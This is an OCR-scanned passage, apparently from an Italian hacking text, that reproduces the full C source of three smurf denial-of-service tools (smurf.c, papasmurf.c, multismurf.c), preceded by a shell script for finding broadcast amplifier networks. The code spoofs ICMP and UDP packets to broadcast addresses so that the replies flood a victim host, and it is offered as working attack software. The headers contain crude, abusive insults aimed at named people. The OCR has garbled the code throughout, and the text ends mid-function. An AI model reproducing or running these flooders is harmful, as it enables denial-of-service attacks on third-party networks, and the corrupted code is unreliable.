# replies . 




ping -c 2 $1 > $1. out 




if 




cat $1 . out 1 grep dupl > /dev/null 




then 




export DUPES="*cat $l.out / grep dupl / cut -d'+' -f2 / cut -d ' 


' -fi ' " 


else 




export DUPES=1 




fi 




if [ $DUPES -gt 30 ]; then 




echo "$1 had $DUPES dupes" » bips . results 




rm —f $1 . out 




else 




rm -f $1 . out 





Il sorgente in Linguaggio C relativo a questo tipo di exploits è quello che segue. 
Il programma è per ambiente Unix. 



smurf. c 

/* 

* $Id smurf. c,v 5.0 1991/10/13 22:31:21 CDT griffin Exp $ 
* 

* spoofs icmp packets from a host to various broadcast addresses resulting in 

* multiple replies to that host from a single packet . 
* 

* orginial linux code by tfreak, most props to him, ali I did was port it to 

* operating systems with a less perverse networking system, such as FreeBSD, 

* and many others. —Griffin 
* 

* mad head to: nyt, soldier, autopsy, legendnet, icOde, irq for being my guinea 

* pig, MissSatan for swallowing, napster for pimping my sister, the guy that 

* invented vaseline, fyber for trying, knowy, old school §havok, kain cos he 

* rox my sox, zuez, toxik, robocod, and everyone else that i might have 

* missed (you know who you are) . 
* 

* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing 
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* he is (he's -almost- as stubborn as me, stili i managed to pick up half 

* the cheque) . 
* 

* and a special hi to Todd, face it dude, you're fucking awesome. 
* 

* mad anal to: §madcrew/§conflict for not cashing in their cluepons, EFnet 

* IRCOps because they plain suck, Rolex for being a twit, everyone that 

* trades warez, Caren for being a lesbian hoe, AcidKill for being her 

* partner, ichaOs, sedriss for having an ego in inverse proportion to his 

* penis and anyone that can't pee standing up — you don't know what your 

* missing out on. 
* 

* and anyone thats ripped my code (diff smurf.c axcast.c is rather 

* interesting) . 
* 

* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins 

* for trying to steal my girl friend. Not only did you show me no respect 

* but you 're a manipulating prick who tried to take away the most important 

* thing in the world to me with no guilt whatsoever, and for that I wish you 

* nothing but pain. Die. 
* 

* disclaimer : I cannot and will not be held responsible nor legally bound for 

* the malicious activities of individuals who come into possession of this 

* program and I refuse to provide help or support of any kind and do NOT 

* condone use of this program to deny service to anyone or any machine. This 

* is for educational use only. Please Don't abuse this. 
* 

* Well, i really, really, hate this code, but yet here I am creating another 

* disgusting version of it. Odd, indeed. So why did I write it? Well, I, 

* like most programmers don't like seeing bugs in their code. I saw a few 

* things that should have been done better or needed fixing so I fixed them. 

* -shrug-, programming for me as always seemed to take the pain away . . . 
* 

* 

*/ 



iinclude <signal.h> 
iinclude <stdio.h> 
iinclude <stdlib.h> 
iinclude <netdb.h> 
iinclude <sys/socket . h> 
iinclude <sys/types . h> 
iinclude <netinet/in . h> 
iinclude <netinet/insystm. h> 
iinclude <netinet/ip . h> 
iinclude <netinet/ip_icmp . h> 
iinclude <ctype.h> 
iinclude <arpa/inet . h> 
iinclude <unistd.h> 
iinclude <string.h> 

void banner (void) ; 

void usage(char *) ; 

void smurf(int, struct sockaddr in, u long, int) ; 

void ctrlc (int) ; 

unsigned int host2ip (char *hostname) ; 

unsigned short in chksum (u short *, int); 

unsigned int 
host2ip(char *hostname) 
{ 

static struct in^addr i; 
struct hostent *h; 
i.s_addr = inet_addr (hostname) ; 
if (i.s_addr == -1) { 

h = gethostbyname (hostname) ; 
if (h == NULL) { 

fprintf (stderr, "can't find %s\n.", hostname); 
exit (0) ; 

} 

bcopy (h->h_addr, (char *) Si.s_addr, h->h_length) ; 

) 

return i.s_addr; 



/* stamp */ 
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int 

mainfint argc, char *argv[]) 
{ 

struct sockaddr^in sin; 
FILE *bcastf±le; 

int i, sock, bcast, delay, num, pktsize, cycle = 0, 

x; 

char buf[32], **bcastaddr = malloc (8192) ; 

banner () ; 

signal (SIGINT, ctrlc) ; 

if (argc < 6) 

usage (argv[0] ) ; 

sin . sin_addr . s__addr = host2ip (argv[l] ) ; 
sin.sin_family = AF_INET; 

num = atoi (argv[3] ) ; 
delay = atoi (argv[4] ) ; 
pktsize = atoi (argv[5] ) ; 

if ( (bcastfile = fopen (argv[2] , "r")) == NULL) { 
perror ( "opening bcast file ") ; 
exit (-1) ; 

} 

x = 0; 

while (! feof (bcastfile) ) ( 

fgets (buf, 32, bcastfile) ; 

if (buf[0] == '#' Il buf 10] == '\n' Il ! isdigit (buf [0] ) ) 

continue; 
for (i = 0; i < strlen (buf) ; i++) 

if (buf[i] == '\n') 

buf[i] = '\0'; 
bcastaddr[x] = malloc (32) ; 
strcpy (bcastaddr [x] , buf); 
x++; 

} 

bcastaddr [x] = 0x0; 
foiose (bcastfile) ; 

if (x == 0) { 

fprintf (stderr, "ERROR: no broadcasts found in file %s\ti\ti" / argv[2]); 
exit (-1) ; 

} 

if (pktsize > 1024) { 

fprintf (stderr, "ERROR: packet size must be < 1024\n\n") ; 
exit (-1) ; 

} 

if ( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) < 0) ( 
perror ( "getting socket ") ; 
exit (-1) ; 

} 

setsockopt (sock, SOL_SOCKET, SO_BROADCAST , (char *) Sbcast, sizeof (bcast) ) ; 

printf ("Flooding %s (. = 25 outgoing packet s)\n", argv[l]); 

for (i = 0 ; i < num / / !num; i++) { 
if (ì(i % 25)) { 

printf (". ") ; 
fflush (stdout) ; 

} 

smurf(sock, sin, inet_addr (bcastaddr [cycle] ) , pktsize); 
cycle++ ; 

if (bcastaddr [cycle] == 0x0) 

cycle = 0; 
usleep (delay) ; 

ì 

puts("\n\n") ; 
return 0; 

} 

void 

banner (void) 

putsr\nsmurf.c v5 . 0 by TFreak, ported by Griffon») ; 
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void 

usage (char *prog) 
{ 

fprintf (stderr, "usage : 
"<num packets> 
"target 
"bcast file 
"num packets 
"packet delay 
"packet size 

exit (-1) ; 

} 



%s <target> <bcast file> " 
<packet delay> <packet size>\n \n " 
= address to hit\n" 

= file to read broadcast addresses from\n" 
= number of packets to send (0 = flood)\n" 
= wait between each packet (in ms)\n" 
= size of packet (< 1024)\n\n", prog) ; 



void 

smurf (int sock, struct sockaddr in sin, u_long dest, int psize) 
{ 

struct ip *ip; 

struct icmp *icmp; 

char *packet; 

int hincl = 1; 



packet = malloc (sizeof (struct ip) + sizeof (struct icmp) + psize); 
ip = (struct ip *) packet; 

icmp = (struct icmp *) (packet + sizeof (struct ip)); 

memset (packet , 0, sizeof (struct ip) + sizeof (struct icmp) + psize); 

set sockopt (sock, IPPROTO_IP, IP_HDRINCL, Shincl, sizeof (hincl) ) ; 

ip->ip_len = sizeof (struct ip) + sizeof (struct icmp) + psize; 

ip—>ip_hl = sizeof *ip » 2; 

ip—>ip_v — 4; 

ip->ip_ttl = 255; 

ip->ip_tos = 0; 

ip—>ip_off = 0; 

ip->ip_id = htons (getpid() ) ; 

ip—>ip_p = 1 ; 

ip—>ip_src . s_addr = sin . sin_addr . s_addr; 
ip->ip_dst . s_addr = dest; 
ip->ip_sum = 0; 
icmp->icmp_type = 8; 
icmp->icmp_code = 0; 

icmp->icmp_cksum = htons (~ (ICMP_ECHO « 8)); 

sendto (sock, packet, sizeof (struct ip) + sizeof (struct icmp) + psize, 
0, (struct sockaddr *) & sin, sizeof (struct sockaddr) ) ; 



free (packet) ; /* free willy! */ 

} 

void 

ctrlc (int ignored) 
{ 

puts ( "\nDone ! \n ") ; 
exit (1) ; 

} 

unsigned short 

in chksum fu short * addr, int len) 
{ 

register int nleft = len; 
register int sum = 0; 
u_short answer = 0; 



while (nleft > 1) { 

sum += *addr++ ; 
nleft -= 2; 



if (nleft == 1) ( 

* (u_char *) (Sanswer) = * (u_char *) addr; 
sum += answer; 

} 

sum = (sum » 16) + (sum + Oxffff); 
sum += (sum » 16); 
answer = ~sum; 
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} 



Il programma per eccellenza legato a questo tipo d'attacco è quello definito con il termine di 
PAPASMURF.C 



(papa) smurf . c v5.0 by TFreak — http://www.rootshell.com 

A year ago today I made what remains the questionable decislon of 
releasing my program 'smurf , a program which uses broadcast "ampli fiers" 
to turn an icmp flood into an icmp holocaust, into the hands of packet 
monkeys, script kiddies and ali round clueless idiots alike. Nine months 
following, a second program ' fraggle ' , smurf s udp cousin, was introducted 
into their Denial of Service orgy. This brings us to today, July 28, 
1998, one year after my first "mistake" . The result, proof that history 
does repeat itself and a hybrid of the originai programs . 

First may I say that I in no way take credit for "discovering" this. 
There is no doubt in my mind that this idea was invisioned long before 
I was even sperm — I merely decided to do something about it . Secondly, 
if you want to hold me personally responsible for turning the internet 
into a larger sesspool of crap than it already is, then may I take this 
opportunity to deliver to you a message of the utmost importance — "Fuck 
you". If I didn't write it, someone else would have. 

I must admit that there really is no security value for me releasing this 
new version. In fact, my goals for the version are quite silly. First, 
I didn 't like the way my old code looked, it was ugly to look at and it 
did some stupid unoptimized things . Second, it's smurfs one year 
birthday — Since I highly doubt anyone would have bought it a caie, J 
thought I would do something "special " to commemorate the day. 

Hmm, I am starting to see why I arti known for my headers (wage eats 
playdough ! ) . 

fieli, I guess this wouldn't be the same if I did not include some sort 
of shoutouts, so here goes . . . 

A hearty handshake to. . . 

o MSofty, pbug, Kain — No matter which path each of you decides to 
take in the future, I will always look back upon these days as one 
of the most enjoyable, memorable and thought— provoking experiences 
of my life. I have nothing but the highest degree of respect for 
each of you, and I value your friendship immensely. Here ' s to 
living, learning and laughing — Cheers gentlemen . — Dan 

o Hi JoJo! 

o morbid and his grandam barbiegirl gino styles, yo. 
o The old ihavok crew. 

o Pharos, silph, chris@unix . org, Viola, Vonne, Dianora, fyber, silitek, 
brightmn, Craig Huegen, Dakal, Col^Rebel, Rick the Temp, jenni' ,Paige, 
RedFemme, nici, everlast, and everyone else I know and love. 

A hearty enema using 15 . Omol/L HC1 to. . . 

o §Conflict . Perhaps you are just my scapegoat of agression, but you 
ali really need to stop flooding efnet servers/taking over ire 
channels/mass owning networks running old qpoppers and get a 
fucking life. 

o BR. It wouldn 't be the same without you in here, but to be henest 
you really aren't worth the space in the already way-to—bloated 
header, nor the creative energy of me coming up with an intricate 
bash that you will never understand anyway. Shrug, hatred disguises 
itself as apathy with time. 

I feel like I'm writing a fucking essay here. . . 

To compile: "gec —DLINUX —o smurf 5 papasmurf.c" if your LINUXish. 

or just 

"gec —o smurf 5 papasmurf.c" if your BSDish. 

Old linux kernels won't have BSD header support, so this may not compile. 
If you wish a linux— only version, do it yourself, or mail 
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* tfreak@jaded.net, and I might lend you mine. 
* 

* And most importantly, please don't abuse this. If you are going to do 

* anything with this code, learn from it . 
* 

* I remain, 
* 

* TFreak . 
* 

*/ 



/* End of Hideously Long Header */ 

iinclude <stdio.h> 
iinclude <netdb.h> 
iinclude <sys/types . h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <netinet/in systm.h> 
iinclude <arpa/inet . h> 
iinclude <sys/stat.h> 
iinclude <fcntl.h> 
iinclude <unistd.h> 
iinclude <stdlib.h> 
iinclude <string.h> 
iinclude <ctype.h> 
iinclude <time.h> 
iifdef LINUX 

idefine FAVOR__BSD 

iifndef _USE_BSD 
idefine _USE_BSD 
iendif 
iendif 

iinclude <netinet/ip . h> 
iinclude <netinet/ip_icmp . h> 
iinclude <netinet/udp . h> 



/* should be FAVOUR__BSD ;) */ 



iifdef LINUX 
idefine FIX(n) 
ielse 

idefine FIX(n) 
iendif 



htons (n) 
(n) 



struct smurf_t 
{ 

struct sockaddr__in sin; 
int s; 

int udp, icmp; 
int rnd; 
int psize; 
int num; 

*/ 

int delay; 

u_short dstport [25+1 ] ; 
u short srcport ; 
char *padding; 

}; 



/* socket prot structure */ 

/* socket */ 
/* icmp, udp booleans */ 

/* Random dst port boolean */ 

/* packet size */ 

/* number of packets to send 



/* delay between (in ms) 
/* dest port array (udp) */ 

/* source port (udp) */ 
/* junk data */ 



*/ 



/* function prototypes */ 

void usage (char *) ; 

u long resolve (char *) ; 

void getports (struct smurf_t *, char *) ; 
void smurficmp (struct smurf_t * , u_long) ; 
void smurfudp (struct smurf_t *, u__long, int); 
u^short in chksum (u_short *, int); 



int 

main (int argc, char *argv[]) 
{ 

struct smurf_t sm; 
struct stat st; 
u_long bcast [1024] ; 
char buf[32]; 

int c, fd, n, cycle, num = 0, on = 1; 
FILE *bcastfile; 
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/* shameless self promotion banner */ 

fprintf (stderr, "\n (papa) smurf . c v5.0 by TFreak\n\n") ; 

if (argo < 3) 

usage (argv[0] ) ; 

/* set defaults */ 

memset ( (struct smurf_t *) Ssm, 0, sizeof (sm) ) ; 

sm.icmp = 1; 

sm.psize = 64; 

sm.num = 0; 

sm.delay = 10000; 

sm. sin. sin _port = htons(O); 

sm. sin . sin_family = AF_INET; 

sm. srcport = 0; 

sm . dstport [0] = 7; 

/* resolve ' source ' host, quit on error */ 
sm. sin . sin_addr . s_addr = resolve (argv[l] ) ; 

/* open the broadcast file */ 

if C (bcastfile = fopen (argv[2] , "r")) == NULL) 
{ 

perror ( "Opening broadcast file ") ; 
exit (-1) ; 

} 

/* parse out options */ 
optind = 3; 

while ( (c = getopt(argc, argv, "rRn : d:p : P : s : S : f : " ) ) != -1) 
l 

switch (c) 
{ 

/* random dest ports */ 
case ' r ' : 

sm .rnd = 1; 

break; 

/* random src/dest ports */ 
case 'R ' : 

sm .rnd = 1; 
sm. srcport = 0; 

break; 

/* number of packets to send */ 
case 'n ' : 

sm.num = atoi (optarg) ; 

break; 

/* usleep between packets (in ms) */ 
case ' d ' : 

sm.delay = atoi (optarg) ; 

break; 

/* multiple ports */ 
case 'p ' : 

if (strchr (optarg, ', ')) 

getports (Ssm, optarg); 

else 

sm. dstport [0] = (u_short) atoi (optarg) ; 
break; 

/* specify protocol */ 
case 'P ' : 

if (strcmp (optarg, "icmp") == 0) 

{ 

/* this is redundant */ 

sm.icmp = 1; 

break; 

} 

if (strcmp (optarg, "udp") == 0) 
{ 

sm.icmp = 0; 
sm . udp = 1 ; 
break; 

ì 
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{ 

sm.icmp = 1; 
sia . udp = 1 ; 
break; 

} 

puts ("Error: Protocol must Jbe icmp, udp or both") ; 
exit (-1) ; 

/* source port */ 
case 's ' : 

sm.srcport = (u_short) atoi (optarg) ; 
break; 

/* specify packet size */ 
case 'S': 

sm.psize = atoi (optarg) ; 

break; 

/* filename to read padding in from */ 
case '£•: 

/* open and stat */ 

if ((fd = open (optarg, 0_RDONLY) ) == -1) 
{ 

per ror ("Opening packet data file"); 
exit (-1) ; 

} 

if (fstat (fd, &st) == -1) 
{ 

perror ("fstat () ") ; 
exit (-1) ; 

} 

/* malloc and read */ 

sm. padding = (char *) malloc (st . st_size) ; 

if (readffd, sm. padding, st . st_size) < st . st_size) 

{ 

perror ( "read() ") ; 
exit(-l); 

} 

sm.psize = st . st_size; 

dose (fd) ; 

break; 

de fault : 

usage (argv[0] ) ; 

} 

) /* end getopt () loop */ 

/* create packet padding if neccessary */ 

if (! sm. padding) 

{ 

sm. padding = (char *) malloc (sm.psize) ; 
memset (sm. padding, 0, sm.psize) ; 

} 

/* create the raw socket */ 

if ((sm.s = socket (AF_INET, SOCK_RAW, IPPROTO^RAW) ) == -1) 
( 

perror ("Creating raw socket (are you root?) ") ; 
exit (-1) ; 

} 

/* Include IP headers ourself (thanks anyway though) */ 

if ( set sockopt (sm.s, IPPROTO_IP, IP_HDRINCL, (char *)Son, sizeof (on) ) == -1) 
{ 

perror ( "setsockopt () ") ; 
exit (-1) ; 

} 

/* read in our broadcasts and store them in our array */ 

while (fgets (buf, sizeof buf, bcastfile) != NULL) 

( 

char *p; 
int valid; 
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/* skip over comments/blank lines */ 

if (buf[0] == '§' Il buf[0] == '\n') continue; 

/* get rid of newline */ 
buf[strlen(buf) - 1] = '\0'; 

/* check for valid address */ 

for (p = buf, valid = 1; *p != '\0'; p++) 

{ 

if ( ! isdigit(*p) SS *p .'='.' ; 
{ 

fprintf (stderr, "Skipping invalid ip %s\n", buf); 

valid = 0; 

break; 

ì 

} 

/* if valid address, copy to our array */ 

if (valid) 

{ 

bcast [num] = inet_addr(buf); 
num++; 

if (num == 1024) 
break; 

} 

) /* end bcast while loop */ 

/* seed our random function */ 
srand (tinte (NULL) * getpid () ) ; 

/* wee. . */ 

for (n = 0, cycle = 0; n < sm.num II ìsm.num; n++) 
{ 

if (sm.icmp) 

smurficmp (Ssm, bcast [cycle] ) ; 

if (sm.udp) 
{ 

int x; 

for (x = 0; sm.dstport [x] != 0; x++) 
smurfudp (&sm, bcast [cycle] , x) ; 

} 

/* quick nap */ 
usleep (sm.delay) ; 

/* cosmetic psychadelic dots */ 

if (n % 50 == 0) 

{ 

printf(". "); 
fflush (stdout) ; 

} 

cycle = (cycle + 1) % num; 

} 

exit (0) ; 



void 

usage (char *s) 
{ 

fprintf (stderr, 

"usage: %s <source host> <broadcast file> [options]\n" 



"\n 


t 


"Options\n " 


"~P 


Comma separated list of dest ports (default 7)\n" 


"—r 


Use random dest ports\n" 


"-R 


Use random src/dest ports\n" 


"-S 


Source port (0 for random (default) ) \n" 


"-P 


Protocols to use. Either icmp, udp or both\n" 


"-S 


Packet size in bytes (default 64) \n" 


"-f 


Filename containg packet data (not needed)\n" 


"—n 


Num of packets to send (0 is continuous (default) )\n" 


"-d 


Delay inbetween packets (in ms) (default 10000)\n" 
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exit (-1) ; 

} 



u_long 

resolve (char *host) 
{ 

struct in_addr in; 
struct hostent *he; 

/* try ip first */ 

if ( (in . s_addr = inet__addr (host) ) == -1) 
{ 

/* nope, try it as a fqdn */ 

if ( (he = gethostbyname (host) ) == NULL) 

{ 

/* can't resolve, bye. */ 
herror ( "Resolving victim host"); 
exit (-1) ; 

} 

memcpy ( (caddr_t) Sin, he->h_addr, he->h__length) ; 

} 

return (in . s_addr) ; 

} 



void 

getports (struct smurf_t *sm, char *p) 
{ 

char tmpbuf [16] ; 
int n, i; 

for (n = 0, i = 0; (n < 25) && (*p != ' \0 ' ) ; p++, i++) 
{ 

if (*p == ' , •) 
{ 

tmpbuf [i] = '\0'; 
sm->dstport [n] = (u_short) atoi (tmpbuf ) ; 
n++; i = -1; 
continue; 

} 

tmpbuf [i] = *p; 

} 

tmpbuf [i] = '\0'; 

sm->dstport [n] = (u_short) atoi (tmpbuf ) ; 
sm->dstport [n + 1] = 0; 

} 



void 

smurficmp (struct smurft *sm, ulong dst) 
{ 

struct ip *ip; 
struct icmp *icmp; 
char *packet; 

int pktsize = sizeof (struct ip) + sizeof (struct icmp) + sm->psize; 

packet = malloc (pktsize) ; 
ip = (struct ip *) packet; 

icmp = (struct icmp *) (packet + sizeof (struct ip) ) ; 

memset (packet , 0, pktsize) ; 

/* fili in IP header */ 

ip—>ip_v = 4; 

ip—>ip_hl = 5; 

ip—>ip_tos = 0; 

ip—>ip_len = FIX (pktsize) ; 

ip->ip_ttl = 255; 

ip—>ip_off = 0; 

ip->ip_id = FIX( getpid() ); 

ip->ip_p = IPPROTO_ICMP; 
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±p—>ip_src . s_addr = sm->sin.sinaddr.saddr; 
ip->ip_dst . s_addr = dst; 

/* fili in ICMP header */ 
icmp->icmp__type = ICMP_ECHO; 
icmp->icmp_code = 0; 

icmp->icmp_cksum = htons (~ (ICMP_ECHO « 8) ) ; /* thx griffin */ 

/* send it on its way */ 

if (sendto (sm->s, packet, pktsize, 0, (struct sockaddr *) Ssm->sin, 
sizeof (struct sockaddr) ) == -1) 

{ 

perror ( "sendto () ") ; 
exit (-1) ; 

} 

f ree (packet ) ; /* free Willy! */ 



void 

smurfudp (struct smurf_t *sm, u_long dst, int n) 
{ 

struct ip *ip; 
struct udphdr *udp; 
char *packet, *data; 

int pktsize = sizeof (struct ip) + sizeof (struct udphdr) + sm->psize; 

packet = (char *) malloc (pktsize) ; 
ip = (struct ip *) packet; 

udp = (struct udphdr *) (packet + sizeof (struct ip) ) ; 

data = (char *) (packet + sizeof (struct ip) + sizeof (struct udphdr)); 

memset (packet , 0, pktsize) ; 
if (*sm->padding) 

memcpy ( (char *)data, sm->padding , sm->psize) ; 

/* fili in IP header */ 

ip—>ip_v = 4; 

ip—>ip_hl = 5; 

ip->ip_tos = 0; 

ip—>ip_len = FIX (pktsize) ; 

ip->ip_ttl = 255; 

ip—>ip_off = 0; 

ip->ip_id = FIX( getpid() ); 

ip->ip_p = IPPROTO_UDP; 

ip—>ip_sum = 0; 

ip—>ip_src . s^addr = sm->sin.sin addr.s^addr; 
ip—>ip_dst . s_addr = dst; 

/* fili in UDP header */ 

if (sm—>srcport) udp- >uh sport = htons (sm->srcport) ; 
else udp— >uh sport = htons (rand() ) ; 
if (sm—>rnd) udp—>uh_dport = htons (rand() ) ; 
else udp—>uh_dport = htons (sm->dstport [n] ) ; 
udp—>uh ulen = htons (sizeof (struct udphdr) + sm->psize) ; 
// udp—>uh_sum = in_chksum ( (u short *)udp, sizeof (udp) ) ; 

/* send it on its way */ 

if (sendto (sm—>s , packet, pktsize, 0, (struct sockaddr *) &sm->sin, 
sizeof (struct sockaddr) ) == —1) 

{ 

perror ( "sendto () ") ; 
exit (-1) ; 

} 

free (packet ) ; /* free Willy! */ 

} 



u_short 

in chksum (u short *addr, int len) 
{ 

register int nleft = len; 
register u_short *w = addr; 
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u_short answer = 0; 

while (nleft > 1) 
{ 

sum += *w++; 
nleft -= 2; 

ì 

if (nleft == 1) 
{ 

* (u_char *) (Sanswer) = * (u_char *)w; 
sum += answer; 

} 

sum = (sum » 16) + (sum + Oxffff) ; 
sum += (sum » 16); 
answer = ~sum; 
return (answer) ; 

} 

/* EOF V 

Un altro programma legato allo smurf è quello che segue. 

/* Multi Smurf by Sagatcool and Gullecool can let u packet many ips ali 
together 

by ImperlalS Crew 2001 . 
Don't do shits just test your machlnes ! 
*/ 

^include <stdlo.h> 

^include <netdb.h> 

^include <sys/types . h> 

^include <sys/socket . h> 

^include <netlnet/ln .h> 

# include <netinet/in_systm.h> 

^include <arpa/inet . h> 

iinclude <sys/stat.h> 

^include <fcntl.h> 

^include <unistd. h> 

^include <stdlib.h> 

iinclude <string. h> 

# include <ctype.h> 

iinclude <time .h> 

#ifdef USE_BSD 

iundef USE_BSD 

tendi f 

# include <netinet/ip.h> 
^include <netinet/ip_icmp . h> 

tfdefine MAX_IP 10 

struct smurf_t 
{ 





struct sockaddr_in sin; 


/* 


socket 


prot structure */ 










int s; 


/* 


socket 


*/ 










int rnd; 


/* 


Random 


dst port boolean */ 










int psize; 


/* 


packet 


size */ 










int num; 


/* 


number 


of packets to send */ 










int delay; 


/* 


delay 


between (in ms) */ 










u_short dstport [ 25+1 ] ; 


/* 


dest 


port array (udp) */ 
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char *padding; /* junk 

data */ 

}; 

typedef char str±ng[15] ; 

/* function prototypes */ 
vold usage (char *) ; 
u_long resolve (char *) ; 

vold getports (struct smurf_t *, char *) ; 
void smurficmp (struct smurf_t * , u_long) ; 
u_short ln_chksum (u_short *, int) ; 
int calcolamax (string *,lnt); 

int 

main (int argc, char *argv[]) 
{ 

struct smurf_t sm[MAX_IP] ; 
string s[MAX_IP]; 
struct stat st; 
u_long bcast [1024] ; 
char buf[32]; 

int c, fd, n, cycle, num = 0, on = 1; 
FILE *bcastfile; 
int i , maxip , j , ang ; 



/* shameless self promotion banner */ 
fprintf (stderr, "\n multismurf . c vl.Ob \033 [1; 36m by 
sagatcool & Guilecool \033 [Om(thanks to TFreak) \n\n") ; 

if (argc < 3) 

usage (argv[ 0] ) ; 

for (j=l; j<argc; 
{ 

for (i=0 ; i<=strlen (argv[j]) ; i++) 
s[j-l] [i]=argv[j] [i] ; 

} 

maxip=calcolamax (s, argc) ; 

printf ("\t\t\t\033 [5; lm %d FLOOD REQUEST SENT 

\033[0m 
", maxip) ; 

for (i=0 ; i<maxip; i++) 
{ 

/* set defaults */ 

memset ( (struct smurf_t *) &sm[i] , 0 , sizeof (sm[i] ) ) ; 
sm[i] .psize = 64; 
sm[i ] .num = 0; 
sm[i] .delay = 10000; 
sm[i] . sin. sin __port = htons (0) ; 
sm[i] . sin . sin_family = AF_INET; 
sm[i] . srcport = 0; 
sm[i] .dstport [0] = 7; 

/* resolve 'source' host, quit on error */ 
sm[i] . sin. sin_addr. s_addr = resolve (s [i] ) ; 
} 

/* open the broadcast file */ 

if ( (bcast file = f open (s [maxip] , "r")) == NULL) 
{ 

perror ("Opening broadcast file"); 
exit (-1) ; 

} 
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optind = 3; 

whlle ( (c = getopt (argc, argv, "rRn : d:p :P : s : S : f: " ) ) ! = 

-1) 

{ 

swltch (c) 
{ 

/* random dest ports */ 
case 'r': 

sm[0] .rnd = 1; 

break; 

/* random src/dest ports */ 
case 'R ' : 

sm[0] .rnd = 1; 

sm[0] . srcport = 0; 

break; 

/* number of packets to send */ 
case 'n ' : 

sm[0] .num = atol (optarg) ; 

break; 

/* usleep between packets (in ms) */ 
case 'd': 

sm[0] . delay = atoi (optarg) ; 

break; 

/* multiple ports */ 
case 'p ' : 

if (strchr (optarg, ' ,')) 

getports (&sm[0 ] , optarg) ; 

else 

sm[0] . dstport [0] = 

(u_short) atoi (optarg) ; 

break; 

/* source port */ 
case 's': 

sm[0] . srcport = (u_short) atoi (optarg) ; 
break; 

/* specify packet size */ 
case 'S': 

sm[0] .psize = atoi (optarg) ; 

break; 

/* filename to read padding in from */ 
case '£': 

/* open and stat */ 

if ((fd = open (optarg, 0_RDONLY) ) == -1) 
{ 

perror ("Opening packet data file"); 
exit(-l); 

} 

if (fstat(fd, &st) == -1) 
{ 

perror ("f stat () ") ; 
exit (-1) ; 

} 

/* malloc and read */ 
sm[0] .padding = (char 

if (read(fd, sm[0] .padding, 

{ 

perror (" read () "); 



*) malloc (st . st_size) ; 
st . st_size) < st . st_size) 
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sm[0] .pslze = st.st_slze; 

dose (fd) ; 

break; 

default : 

usage (argv[0 ] ) ; 

} 

} /* end getopt () loop */ 

for (1=0; l<maxlp; 
{ 

/* create packet padding if neccessary */ 

If ( ! sm[l] . padding) 

{ 

sia [1] .padding = (char *) malloc (sm[l] .pslze) ; 
memset (sm[l] . padding, 0, sm[l] . pslze) ; 

} 

/* create the raw socket */ 

If ((sm[l].s = socket (AF_INET, SOCK_RAW, 

IPPROTO_RAW) ) == -1) 

{ 

perror ("Creatlng raw socket (are you root?) ") ; 
exit (-1) ; 

} 

/* Include IP headers ourself (thanks anyway though) 

*/ 

If (setsockopt (sm[l] .s, IPPROTO_IP, IP_HDRINCL, 
(char *)&on, slzeof (on) ) == -1) 

{ 

perror ( "setsockopt () ") ; 
exit (-1) ; 

} 

}/* Fine Ciclo */ 

/* read in our broadcasts and store them in our array 

*/ 

while (fgets (buf, slzeof buf, bcastfile) != NULL) 
{ 

char *p; 
int valid; 

/* skip over comments/blank lines */ 

if (buf[0] == '#' // buf[0] == '\n') continue; 

/* get rid of newline */ 
buf[strlen(buf) - 1] = ' \0 ' ; 

/* check for valid address */ 

for (p = buf, valid = 1; *p != ' \0 ' ; p++) 

{ 

if ( ! isdigit(*p) && *p != '.' ) 
{ 

fprintf (stderr, "Skipping invalid ip 

%s\n", buf); 

valid = 0; 
break; 

} 

) 

/* if valid address, copy to our array */ 

if (valid) 

{ 

bcast [num] = inet_addr(buf); 
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if (num == 1024) 
break; 

} 

} /* end bcast while loop */ 

/* seed our random function */ 
srand (tinte (NULL) * getpid () ) ; 
/* uree. . */ 
1=0; 

for (n = 0, cycle = 0; n < sm[0].num II 



!sm[0].num; n++) 



{ 



if(i==maxip) 1=0; 

smurflcmp (&sm[l] , bcast [cycle] ) ; 

/* qulck nap */ 
usleep (sm[0] . delay) ; 

/* cosmetlc psychadellc dots */ 

lf (n % 50 == 0) 

{ 

prlntf( " \ 033 [1 ; 34m . \ 033 [Om ") ; 
fflush (stdout) ; 

} 

1++; 

cycle = (cycle + 1) % num; 



exit (0) ; 



} 



vold 

usage (char *s) 
{ 

fprlntf (stderr, 

"usage: %s <vlctim host_l> [<vlctlm host_2> 
<victlm host_10>] <broadcast file> [optlons]\n" 

'\n" 

"Optlons\n " 
-P = 



(de fault 7) \n" 

(default) ) \n" 
64) \n" 
needed) \n" 

contlnuous (default) ) \n" 
(de fault 10000) \n" 

exit (-1) ; 

} 



'-r: 
-R: 
'-s : 

'-S: 

-f: 

'-n : 

-d: 

'\n", s); 



Comma separated list of dest ports 

Use random dest ports\n" 
Use random src/dest ports\n" 
Source port (0 for random 

Packet size in bytes (default 

Filename containg packet data (not 

Num of packets to send (0 is 

Delay inbetween packets (in ms) 



u_long 

resolve (char *host) 
{ 

struct in_addr in; 
struct hostent *he; 

/* try ip first */ 

if ( (in. s_addr = inet_addr (host) ) == -1) 
{ 
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if ( (he = gethostbyname (host) ) == NULL) 
{ 

/* can't resolve, bye. */ 
herror ( "Resolving victim host") ; 
exit(-l); 

ì 

memcpy ( (caddr_t) Sin, he->h_addr, he->h_lengrth) ; 

} 

return (in . s_addr) ; 

} 



void 

getports (struct smurf_t *sm, char *p) 
{ 

char tmpbuf [16] ; 
int n, i; 

for (n = 0, i = 0; (n < 25) SS (*p != ' \0 ' ) ; p++, 1++) 
{ 

if (*p == ', ') 
{ 

tmpbuf [i] = '\0'; 

sm->dstport [n] = (u_short) atoi (tmpbuf ) ; 

n++; i = -1; 

continue; 

} 

tmpbuf [i] = *p; 

} 

tmpbuf [i] = '\0'; 

sm->dstport [n] = (u_short) atoi (tmpbuf ) ; 
sm->dstport [n + 1] = 0; 

} 

void 

smurficmp (struct smurf_t *sm, u_long dst) 
{ 

struct iphdr *ip; 
struct icmphdr *icmp; 
char *packet; 

int pktsize = sizeof (struct iphdr) + sizeof (struct 

icmphdr) + sm->psize; 

packet = malloc (pktsize) ; 

ip = (struct iphdr *) packet; 

icmp = (struct icmphdr *) (packet + sizeof (struct 

iphdr) ) ; 

memset (packet , 0, pktsize); 

/* fili in IP header */ 
ip->version = 4; 
ip->ihl = 5; 
ip->tos = 0; 

ip->tot_len = htons (pktsize) ; 
